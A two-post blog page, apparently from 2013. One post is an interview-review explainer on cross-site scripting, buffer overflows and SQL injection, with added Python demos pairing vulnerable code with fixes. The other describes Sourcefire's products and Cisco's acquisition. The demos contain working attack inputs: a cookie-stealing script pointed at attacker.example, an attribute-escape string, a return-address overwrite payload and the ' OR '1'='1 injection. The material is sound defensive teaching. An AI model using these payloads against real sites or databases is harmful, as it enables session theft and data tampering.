Wednesday, July 31, 2013

Relearning Specific Technical Interview Questions!


Something that always gets me (in a bad way) in job interviews is those pointed, very technical questions about something specific.  The two that I am least a fan of are cross-site scripting and buffer overflows.  When I read about either, I understand how they work, but ask me later, and I draw a complete blank.  I need a way to easily remember what each one is, and I may just add in SQL injection too!

            What do you say when you’re asked “what is cross-site scripting”?  At its simplest, a cross-site scripting (XSS) attack occurs when an attacker gets their own script into a page served by a site that otherwise seems uncompromised and trusted.  That script is then delivered to another user of the site and runs in the victim’s browser, where it can steal session cookies, act on the victim’s behalf, or rewrite the page.  This is a common web application vulnerability that occurs when user-supplied input is written into a page without being validated and encoded for the context it lands in (HTML body, attribute, JavaScript, URL).  The victim’s browser cannot tell the injected script from the site’s own code: both arrive from the same origin, so it runs the attacker’s script with the same privileges.

            OWASP (the Open Web Application Security Project) is a great resource for any web application developer looking for ways to prevent cross-site scripting attacks from occurring.  It is a free, community-maintained source of guidelines for building secure web applications and reducing the vulnerabilities in your site; its XSS Prevention Cheat Sheet in particular spells out how to encode output for each context.
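To make the two paragraphs above concrete, here is an added example (not code from the original post, and not OWASP's own code) of a page that reflects a user-supplied name with and without output encoding. The attacker payload, the page templates and the `executes_script` check are all constructed for the demonstration; the check is a crude stand-in for the browser's HTML parser, not a real XSS filter.

```python
import html

# Constructed attacker input: a classic reflected-XSS probe that ships the
# victim's cookies to an attacker-controlled host (placeholder hostname).
XSS_PAYLOAD = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'


def render_greeting_vulnerable(name: str) -> str:
    """Builds the page by string interpolation with no output encoding.
    Whatever the user typed becomes part of the page's markup, so a <script>
    element in the input is a live <script> element in the page."""
    return f"<html><body><h1>Hello, {name}!</h1></body></html>"


def render_greeting_fixed(name: str) -> str:
    """Same page, but the untrusted value is HTML-entity encoded for the HTML
    body context, so the browser renders '<script>' as visible text."""
    return f"<html><body><h1>Hello, {html.escape(name, quote=True)}!</h1></body></html>"


def render_attribute_fixed(name: str) -> str:
    """Attribute context: the quote characters must be encoded too, otherwise
    input like  x" onmouseover="alert(1)  closes the value attribute and adds
    an event handler. quote=True covers both ' and "."""
    return f'<input type="text" value="{html.escape(name, quote=True)}">'


def executes_script(page: str) -> bool:
    """Crude model of what the browser would do: is there a real <script
    start tag in the markup? (An encoded &lt;script&gt; is just text.)
    Demonstration only; do not use string matching as an XSS defence."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable page runs the script:", executes_script(render_greeting_vulnerable(XSS_PAYLOAD)))
    print("encoded page runs the script:   ", executes_script(render_greeting_fixed(XSS_PAYLOAD)))
    print(render_attribute_fixed('x" onmouseover="alert(1)'))
```

The point the OWASP guidance makes, and the example shows, is that the fix is encoding at output time for the exact context the data is written into, not trying to strip "bad" characters on the way in.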

            What are buffer overflow attacks?  A buffer is an area of memory set aside to hold a fixed amount of data.  When a bug in the code lets more data be written than the buffer can hold, the excess spills into adjacent memory, and a buffer overflow occurs.  This is typical of languages like C, where the program itself is responsible for checking lengths before it copies.  Attackers look for these bugs (which are still common) and feed in oversized input on purpose: at minimum this corrupts neighbouring data and crashes the program, producing errors or denial of service, but if the bytes past the end of the buffer land on control data such as a saved return address, the attacker gets to choose what code runs next.
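The layout that makes this dangerous can be shown without crashing anything. The following added example (my own, not from the original post) uses `ctypes` to lay out a model stack frame, a 16-byte buffer followed by a saved return address, and then copies an oversized input into it the way `strcpy()` would, versus the way a length-checked copy would. The frame layout, the addresses and the payload are all constructed for the demonstration; real stack layouts are compiler-dependent, but the mechanism is the same.

```python
import ctypes

BUF_SIZE = 16


class StackFrame(ctypes.Structure):
    """Model of a stack frame: a fixed-size local buffer immediately followed
    by the saved return address. (Constructed layout; real compilers may put
    padding or other locals in between, but control data still sits at a
    fixed distance past the buffer.)"""
    _fields_ = [("buf", ctypes.c_char * BUF_SIZE),
                ("saved_ret", ctypes.c_uint64)]


# Placeholder addresses, chosen for the demonstration only.
LEGIT_RETURN = 0x0000000000401136      # where the function should return to
ATTACKER_RETURN = 0xDEADBEEFCAFEBABE   # address the attacker wants to jump to

# Constructed attacker input: fill the buffer, then overwrite saved_ret with
# the attacker's address in little-endian byte order (x86-64 convention).
OVERFLOW_PAYLOAD = b"A" * BUF_SIZE + ATTACKER_RETURN.to_bytes(8, "little")


def fresh_frame() -> StackFrame:
    """A frame as it looks on function entry: empty buffer, legitimate return."""
    frame = StackFrame()
    frame.saved_ret = LEGIT_RETURN
    return frame


def unbounded_copy(frame: StackFrame, data: bytes) -> StackFrame:
    """Mimics strcpy(buf, data): every input byte is written starting at buf,
    with no check against BUF_SIZE. Bytes 16..23 land on saved_ret.
    The copy is clamped to the struct so this demo only ever corrupts its own
    24 bytes of memory and never the Python process around it."""
    if len(data) > ctypes.sizeof(frame):
        raise ValueError("payload longer than the model frame; refusing to corrupt real memory")
    ctypes.memmove(ctypes.addressof(frame), data, len(data))
    return frame


def bounded_copy(frame: StackFrame, data: bytes) -> StackFrame:
    """Mimics snprintf(buf, sizeof buf, "%s", data): at most BUF_SIZE-1 bytes
    are copied and the buffer is NUL-terminated, so saved_ret is never touched."""
    n = min(len(data), BUF_SIZE - 1)
    ctypes.memmove(ctypes.addressof(frame), data[:n] + b"\x00", n + 1)
    return frame


def return_hijacked(frame: StackFrame) -> bool:
    """True if the overflow changed where the function will return to."""
    return frame.saved_ret != LEGIT_RETURN


if __name__ == "__main__":
    bad = unbounded_copy(fresh_frame(), OVERFLOW_PAYLOAD)
    good = bounded_copy(fresh_frame(), OVERFLOW_PAYLOAD)
    print(f"strcpy-style copy:  saved_ret = {bad.saved_ret:#018x}  hijacked={return_hijacked(bad)}")
    print(f"bounded copy:       saved_ret = {good.saved_ret:#018x}  hijacked={return_hijacked(good)}")
```

Run it and the unbounded copy reports the attacker's address in `saved_ret` while the bounded copy keeps the legitimate one; the 24 bytes of input are identical in both cases, and only the length check differs.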

            Finally, while I’ve never personally been asked this question, what is SQL injection?  These attacks, if successful, can be particularly nasty.  SQL injection attacks involve placing SQL syntax in an input field so that it becomes part of the query the application sends to its database, letting the attacker read or modify data they should never reach.  Data can be tampered with, including changing prices or account balances.  All data may be exposed to unauthorized users, or may be destroyed entirely.  The vulnerability is not tied to any one programming language: it appears wherever a query is built by gluing user input into a string, and it goes away when the input is handed to the database separately as a parameter (a prepared or parameterized statement).  This is one vulnerability that all web developers must check for before going live!
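Here is an added example (my own, not from the original post) of both halves of that paragraph, using Python's built-in `sqlite3` so it runs offline: a lookup and an update that build their `WHERE` clause by string concatenation, beside the parameterized versions. The `accounts` table, its three rows and the injection string are all constructed for the demonstration.

```python
import sqlite3

# Constructed attacker input: closes the quoted string the application opened
# and appends a condition that is true for every row.
INJECTION = "' OR '1'='1"


def build_db() -> sqlite3.Connection:
    """In-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("alice", 120), ("bob", 40), ("carol", 900)])
    conn.commit()
    return conn


def balance_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """The username is pasted into the SQL text. With INJECTION the query the
    database sees is:
        SELECT ... WHERE username = '' OR '1'='1'
    which returns every account, not just the caller's."""
    query = f"SELECT username, balance FROM accounts WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def balance_parameterized(conn: sqlite3.Connection, username: str) -> list:
    """The SQL text is fixed; the username travels as a bound parameter, so the
    database compares the literal string "' OR '1'='1" against usernames and
    finds nothing. No escaping or input filtering is needed for this to hold."""
    return conn.execute(
        "SELECT username, balance FROM accounts WHERE username = ?", (username,)
    ).fetchall()


def zero_balance_vulnerable(conn: sqlite3.Connection, username: str) -> int:
    """Same bug on a write path: an attacker who can influence the WHERE clause
    of an UPDATE can tamper with every row. Returns rows affected."""
    cur = conn.execute(f"UPDATE accounts SET balance = 0 WHERE username = '{username}'")
    conn.commit()
    return cur.rowcount


def zero_balance_parameterized(conn: sqlite3.Connection, username: str) -> int:
    """Parameterized UPDATE: the injection string matches no account, 0 rows change."""
    cur = conn.execute("UPDATE accounts SET balance = 0 WHERE username = ?", (username,))
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable read with injection:  ", balance_vulnerable(conn, INJECTION))
    print("parameterized read with injection:", balance_parameterized(conn, INJECTION))
    print("rows zeroed by injected UPDATE:   ", zero_balance_vulnerable(conn, INJECTION))
```

Note that the parameterized versions are not "filtering" anything: the query text and the data are sent to the database as separate things, so there is no way for the data to change the shape of the query. That is the check to make before going live, and it applies no matter which language the application is written in.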

            I’ve learned over the years in my IT career that the less tangible the technology or concept, the more difficulty I have in retaining and recalling information.  Give me a network diagram any day and I can easily visualize the traffic flow and determine what protocols are required and what connections are needed.  But, coding and anything related to software design is out of my league.  I hope that by writing this post that I may recall these 3 common attacks at a later date!

Who Is Sourcefire?


In response to recent news that Cisco Systems is acquiring Sourcefire, I thought I would begin by telling you a bit about the latter company's technology.  Sourcefire is a network security company offering products such as next-generation firewalls and IPS appliances, as well as malware protection.  Probably the most widely known Sourcefire product is its open source IDS/IPS, Snort.  Billed as a powerful, effective IDS/IPS, Snort gives the technically savvy administrator a hands-on, command-line view of how intrusion prevention works.  
Building on Snort, Sourcefire offers a commercial, enterprise-ready IPS.  These appliances protect your network from unauthorized attackers through rule sets that are tuned with awareness of the hosts and applications actually on the network, and adjusted automatically rather than by hand, so that malware, attacks and other malicious traffic are blocked.  The appliance monitors your network traffic, analyzes its behavior, and keeps its choice of rules up to date about what traffic to stop from entering your environment.  
Malware is on the rise and companies are looking for ways to prevent infections before they occur, or at least to catch them early.  Newer technologies, like Sourcefire's FireAMP (Advanced Malware Protection), show that files and traffic can be analyzed before a full-blown attack takes place.  The system checks for known malware and also watches for suspicious patterns, and it keeps a record of what it has seen, so that something later found to be malicious can be traced back.  FireAMP therefore helps administrators find out where a malware infection began as well as what triggered it.  
Cisco Systems is known for its superb, yet pricey, networking equipment, so it comes as no surprise that it would purchase Sourcefire in an attempt to increase its play in the enterprise network security market.  With a large portion of customers in the networking niche already, Cisco, I assume, hopes to become more involved in protecting the very equipment and infrastructure that it has spent many years perfecting.